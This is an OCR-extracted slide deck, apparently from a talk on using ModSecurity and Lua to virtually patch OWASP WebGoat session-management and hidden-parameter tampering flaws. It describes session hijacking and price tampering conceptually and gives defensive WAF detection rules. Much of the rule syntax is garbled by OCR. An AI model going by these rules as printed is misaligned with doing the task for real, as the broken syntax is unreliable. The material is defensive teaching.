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S SOLUTION EXAMPLE: 

. SESSION MANAGEMENT FLAWS 
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Session-Based Attacks 



Defect: 

- The web application does not "remember" who it issued the 
SessionID to. 

- Clients submit SessionlDs that the web application did not 
issue (via Set-Cookie) 

Vulnerability: 

- Attacker can use SessionlDs that belong to other users. 
Technique: 

- Brute Force Guessing SessionlDs 

- Session Hijacking 

- Session Fixation 

Consequence: 

- Session Hijacking 
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Identifying Session Attacks 





GET/mybank.php HTTP/1.0 
Host: bank.exarmple.com 
User-Agent: Mozilla/4.0 
Cookie: sessionid=lllll 

Connection: close 



GET/mybank.php HTTP/1.0 
Host: bank.example.com 
User-Agent: Mozilla/5.0 
Cookie: sessionid=lllll 

Connection: close 
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guardian.jumperz.net 



Session Flaw Mitigation 

Tracking SessionlDs 



Use ModSecurity's Session Persistent Collection 



Data is saved for each Session ID 



^ 



Capture Hash Values of Meta-Data and Save in Session Collection 






Valid Session Token 



IP Network Block Hash 



\7 



User-Agent Hash 



Validate SessionID Data on Subsequent Requests 



Valid Session Token 



IP Network Block Hash 



User-Agent Hash 
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Session Rules (1) 

Storing SessionID Meta-Data 



lecRule RESPONSE_HEADERS : /Set-Cookie2?/ "(? 
i:jsessionid=( [a-f 0-9] +) \;\s?) " "phase : 
3, t :none, pass, log, capture, msg: ' Captured session id 
from response cookie: % {TX. 1 } ' , setsid: % {TX. 
1 } , setvar : session. sessionid=% {TX. 1 } , setvar : tx . ip=% 
{ remote_addr } , setvar : tx . ua=% { reques t_headers . user- 
agent} , setvar: session. valid=l" 



SecRule TX:IP " A (\d{ 1, 3 } \ . \d{ 1, 3 } \ . \d{ 1, 3 } \ . ) " 
"phase : 

3, capture, t :none, t : shal, t :hexEncode, no log, pass, setvar 
: session . ip=% { tx . 1 } " 

SecRule TX:UA "(.*)" "phase: 

3, capture, t :none, t : shal, t :hexEncode, no log, pass, setvar 

•session . ua=% { tx . }— 
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Session Rules (2) 

Validate SessionID Meta-Data 



SecRule REQUEST_COOKIES : JSESSIONID "! A $" "phase : 1 , t : none, pass, nolog, setsid: % 
{request_cookies . jessionid} , setvar : session. sessionid=% 

{request_cookies . jsessionid} , setvar : tx. ip=%{remote_addr} , setvar : tx.ua=% 
{request_headers .user-agent} " 

SecRule &SESSION: VALID " ! @eq 1" "phase : 1 , t : none, deny, log, msg : f Invalid SessionID 

Submitted. f " 

SecRule TX:IP " A (\d{ 1, 3 } \ . \d{ 1, 3 } \ . \d{ 1, 3 } \ . ) " "phase: 

2, capture, t : none, t : shal, t ihexEncode, nolog, pass, setvar : tx . ip_hash=% { tx . 1 } " 

SecRule TX:UA "(.*)" "phase: 

2, capture, t :none, t : shal, t :hexEncode, nolog, pass, setvar : tx.ua_hash=% { tx . } " 

SecRule TX:IP_HASH "!@streq %{ SESSION . IP } " "phase: 

2, t : none, pass, log, setvar: tx. sticky_session_anomaly=+l ,msg: T Warning - Sticky 

SessionID Data Changed - IP Address Mismatch. 1 " 

SecRule TX:UA_HASH "!@streq %{ SESSION . UA} " "phase: 

2, t : none, pass, log, setvar: tx. sticky_session_anomaly=+l ,msg: 'Warning - Sticky 

SessionID Data Changed - User-Agent Mismatch. 1 " 

SecRule TX: STICKY_SESSION_ANOMALY "@eq 2" "phase : 2 , t : none, deny, log, msg : f Warning - 
Sticky SessionID Data Changed - IP Address and User-Agent Mismatch. 1 " 
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S SOLUTION EXAMPLE: 

. HIDDEN PARAMETER TAMPERING 
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Hidden Parameter Tampering 



Defect: 

- The web application keeps track of session state 
data by adding on "HIDDEN" form parameters 

Vulnerability: 

- Attackers can manipulate this data. 

Technique: 

- Attack can edit page source or use a local web 
proxy to intercept the response data and change 
data 

Consequence: 

- Session Hijacking, Business Logic Flaws 
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Hidden Parameter Tampering 



j Ewploit Hidden Fields 



J Exploit Hidden Fields - Mozilla Firefox 



File Edit View History Bookmarks Tools Help 

t C X ffi ( Q http://www.webgoat.net/WebGoat/attack?5creen=665&menu=16008JvlOD5EC_C5RF_TOKEN=3 {% - 



Google 



Exploit Hidden Fields 



OWASPWebGoatVS.2 



Introduction 

General 

Access Control Flaws 

AJAX Security 

Authentication Flaws 

Buffer Overflows 

Code Quality 

Concurrency 

Cross-Site Scripting (XSS) 

Denial of Service 

Improper Error Handling 

Injection Flaws 

Insecure Communication 

Insecure Configuration 

Insecure Storage 

Parameter Tampering 

Elicit Hidden Fields 

Elicit Unchecked Email 

Bypass Client Side JavaScript 
Validation 

Session Management Flaws 
Web Services 
Admin Functions 
Challenge 



Solution VideosTry to purchase the HDTV for less than the purchase Restart this Lesson 

uricej if you have not done so already. 



^Source of: http://www.webgoat.net/WebGoat/attack?Screen=665amenu=1600&MOD... LJfnJjX 



File Edit View Help 

J LdJILE! - ■ OUDl'lll ■ L-y £J e- - OUDl'lll ■ ? 

</td> 
</tr> 
</ table >| 
</f orm></div> 



input name =l Price 1 type= ' HIDDEN 1 value= ' 2999 . 99 ' 



3<tor> 



<div id="credits"> 

<table align =l RIGHT 1 ceJJ_spacing= ' ' 
width= ' 90% ' liorder =l O' cel2.padding= ' ' > 
<tr> 

<td valign=' MIDDLE 1 width= ' 100% ' align= ' RIGHT 1 > 

< I 



> 



Line 561, Col 9 



_□ 









Waiting for www.webgoat.net.. 



-# FoxyProxy: Disabled §) ^| §J 
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Parameter Manipulation 

Mitigation 



Use ModSecurity's Session Persistent Collection 



Data is saved for each Session ID 



^ 



Inspect Response Body Payload for HIDDEN Parameter Data 



Save HIDDEN data in Session Collection 



\7 



Validate Parameter Data on Subsequent Requests 



Check if saved Hidden Parameter Name 
Exists in Request 



Ensure the Hidden Parameter Data is 
Unaltered 
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Parameter Manipulation Rules (1) 

Capture Outbound HIDDEN Data 



SecRule RESPONSE_BODY " (<input\s . *type= [ \ "' ] ? 
hidden [\" ' ] ? [\s>] [ A <] *>) " "chain, phase : 
4, t : none, t : lowercase, pass, nolog, capture, setvar : t 
x . hidden data=% { tx . 1 } 



w 



SecRule TX: HIDDEN_DATA "<input 
\s.*name=[\" '] ? ( [\w\s]*) [V] ?[\s>] " 
"chain, capture, setvar : session. hidden_arg_name=% 
{tx.l}" 

SecRule TX:HIDDEN_DATA "<input 
\s.*value=[V" ] ? ( [\w\s\.] *) [\" ' ] ? [\s>] " 
" capture , setvar : session . hidden_arg=% 
{session. hidden arg name}=%{tx. 1} 



w 
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Parameter Manipulation Rules (1) j 

Validate Inbound Parameter Data || 


SecRule &SESSION: HIDDEN ARG NAME "@gt 0" 3 
"chain, phase : B 
2 , t : none, log, auditlog, deny, msg : f Hidden B 
Parameter Manipulation . f " B 

SecRule ARGS POST NAMES B 
"@contains %{ SESSION. HIDDEN ARG NAME}" S 
"chain" ™ 

SecRule REQUEST BODY " ! B 

@contains %{ SESSION. HIDDEN ARG}" B 

\"t :none, t : lowercase" B 
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Viewing Hidden Collection Data 

# Java -cp /root/org. j wall. tools . jar 
org . jwall . tools . CollectionViewer /tmp/ 

Reading collections from /tmp 

Collection default_SESSION, last read @ Fri Jan 30 04:08:39 
EST 2009 

Created at Fri Jan 30 04:05:56 EST 2009 

default_SESSION[] .sessionid = 
D7 98FE2 68D317B3 6002 0B9D7 97EFF2A1 

default_SESSION[] .hidden_arg = price=2999 . 99 

default_SESSION[] . ip = 

d9df73 608 8f7a4a919e4de2 634d4b53d4 87a3b2 6 

default_SESSION[] .ua = 

4 67cbdf2fcbeefll8adf682 37f3ead3a5c7bl67 

default_SESSION[] . hidden_arg_name = price 

default_SESSION[] .TIMEOUT = 3600 

This collection expires in 59m 32.943s 
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The Need for Lua 



ModSecurity Rules Language Limitations 

- Allows for easy "and" logic but it is difficult to 
do if/then/or structures 

- RegEx parsing has problems with capturing 
multiple individual elements (e.g. - more than 
1 HIDDEN parameter) 

ModSecurity has a Lua API 

- User creates scripts that use advanced 
programming logic 

Stephen Evans created many example Lua 
scripts for WebGoat mitigations 

Content Injection (Javascript) + Lua is a 
powerful virtual patching combination 

- Not constrained by pre-packaged, WAF GUI 
functionality 
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www.lua.org 
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Lua Scripts 



SecRuleScript " /etc/modsecurity/data/write-hidden- 
valuesl.lua" \ "phase: 

4, t : none, log, auditlog, allow, msg: 'Writing RESPONSE 
BODY \ & parsed input fields to file using 
luascript ' " 
^» 

local tbuff = m.getvar ("RESPONSE_BODY" , "none") 
for a in string. gmatch (tbuff, "<input .->") do 

t = {} 

for k, v in string. gmatch (a, " (%w+)=' ( . -) ' ") do 
t[k]=v 

end 

if t . type : lower ( ) == "hidden" then 

— write t.type, t.name and t. value to file 
end 
Entry { 

name = "hidden_tan", 

type = "HIDDEN", 

value = "2" 
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Conclusion 



A WAF is more than an "attack blocking device." 

- Can also identify/correct Application Defects. 

- Can be used as an HTTP Auditing device. 

There is a tremendous need for Virtual Patching: 

- Expedite the implementation of mitigations. 

- Provide protection for apps that can't be updated. 

Mod Security is an excellent, tactical tool to use for 
mitigation strategies 

- Robust rules language 

- Content Injection + Lua is powerful 
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Questions? 



Thank you! 



Business: Ryan.Barnett@breach.com 
'Personal: RCBarnett@qmail.com 
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